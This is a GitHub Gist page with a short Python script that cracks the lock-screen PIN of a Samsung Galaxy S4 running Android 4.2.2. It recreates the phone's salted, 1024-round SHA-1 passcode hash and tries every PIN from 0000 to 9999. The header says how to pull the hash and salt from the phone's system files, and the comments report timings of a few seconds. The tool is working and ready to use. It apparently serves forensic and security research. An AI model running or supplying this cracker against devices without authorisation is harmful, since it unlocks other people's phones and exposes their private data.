Last active

Embed URL

HTTPS clone URL

SSH clone URL

You can clone with HTTPS or SSH.

Download Gist

Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2

View samsung_hash_crack.py
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
#!/usr/bin/python
 
'''
Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2
Correct PIN for hash and salt below is 1234.
Get 40-character hash value in ascii hex format from file /data/system/password.key on the phone
Get salt in signed numeric format by doing sqlite3 query SELECT value FROM locksettings WHERE name = 'lockscreen.password_salt' on /data/system/locksettings.db
by @hubert3 2014-01-23
'''
 
import sys
from hashlib import sha1
from binascii import unhexlify
 
def get_salt(salt):
int_salt = int(salt)
int_salt = (int_salt & 0xffffffffffffffff)
salt = hex(int(int_salt)).lstrip("0x")
salt = salt.rstrip('L')
return salt
 
samsung_hash = unhexlify('867B4B7F6C7E5CCC50A1BD183D8C3E5801F20344'.lower())
salt = get_salt(-3343618892075477414)
 
for pin in map('{:04}'.format,range(0,10000)):
print 'Hashing PIN %s' % pin
digest = sha1('0'+pin+salt).digest() # binary digest, not ascii hex
for i in map(str,range(1,1024)): # Samsung uses 1024 SHA-1 iterations
digest = sha1(digest+i+pin+salt).digest()
if digest == samsung_hash:
print 'FOUND PIN %s' % pin
sys.exit(0)
print 'PIN not found'
 
Owner

Takes 20 seconds to try PINs 0000-9999 on 2.6 GHz i7

Python implementation based on info provided by Bjoern Kerler at https://github.com/donctl/sandy/issues/2

Takes 7.5s on an i5 @ 3.2, nice job :)

1.74 seconds with i7@3.5 + Multiprocessing.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.